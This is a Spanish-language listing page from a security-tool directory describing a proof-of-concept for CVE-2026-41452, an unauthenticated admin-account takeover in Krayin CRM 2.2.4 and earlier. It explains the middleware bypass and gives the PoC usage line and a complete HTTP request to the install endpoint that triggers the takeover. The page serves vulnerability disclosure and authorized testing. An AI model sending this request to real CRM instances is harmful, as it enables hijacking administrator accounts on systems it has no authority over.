Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41452-poc — Prueba de concepto de exploit para CVE-2026-41452, un bypass de autenticación crítico en Krayin CRM <= 2.2.4 que permite la toma de control de cuentas de administrador sin autenticación mediante el bypass de middleware. | Kitploit
Herramientas/GitHubGitHub/o-sec/cve-2026-41452-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticación
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

Prueba de concepto de exploit para CVE-2026-41452, un bypass de autenticación crítico en Krayin CRM <= 2.2.4 que permite la toma de control de cuentas de administrador sin autenticación mediante el bypass de middleware.

Ver Repositorio
hace 13h 35mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-41452: Toma de control de la cuenta de administrador de Krayin CRM mediante omisión de middleware

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

Una Prueba de Concepto (PoC) que demuestra una vulnerabilidad crítica de autenticación faltante (CVE-2026-41452) que afecta a Krayin CRM versión 2.2.4 y anteriores.

Esta falla permite a atacantes remotos no autenticados omitir la lógica del middleware de instalación de la aplicación (CanInstall) mediante la inyección de encabezados HTTP específicos, lo que conduce a una sobrescritura completa de la configuración de la cuenta de administrador principal.

[!WARNING]
Descargo de responsabilidad: Este repositorio y la información contenida en él se proporcionan estrictamente con fines educativos, de investigación de seguridad y de auditoría defensiva autorizada. Las pruebas o la explotación no autorizadas de sistemas informáticos son estrictamente ilegales. El autor no asume ninguna responsabilidad por cualquier uso indebido de este material.


Descripción general de la vulnerabilidad

  • ID de CVE: CVE-2026-41452

  • Tipo de vulnerabilidad: Autenticación faltante / Omisión de middleware

  • Gravedad: Crítica (CVSS 9.8)

  • Software afectado: Krayin CRM <= 2.2.4

  • Versión parcheada: Krayin CRM >= 2.2.5

Descripción técnica

La vulnerabilidad se encuentra dentro del middleware de configuración de la aplicación. Un atacante no autenticado puede añadir un encabezado X-Requested-With: XMLHttpRequest a una carga útil elaborada dirigida al endpoint /install/api/admin-config-setup. Esto suprime la comprobación de redirección esperada dentro del middleware CanInstall, exponiendo una operación de base de datos updateOrInsert no autenticada que apunta al ID codificado (1) del administrador principal del sistema.


Prueba de Concepto (PoC)

Uso

Ejecute el script contra una instancia objetivo que esté autorizado a probar:

root@kitploit:~
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>

Ejemplo de solicitud HTTP

En segundo plano, la omisión se activa mediante la siguiente estructura de transacción HTTP:

root@kitploit:~
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

name=test1&[email protected]&password=Password123

Referencias

  • nist cve-2026-41452 detail
Descargar herramienta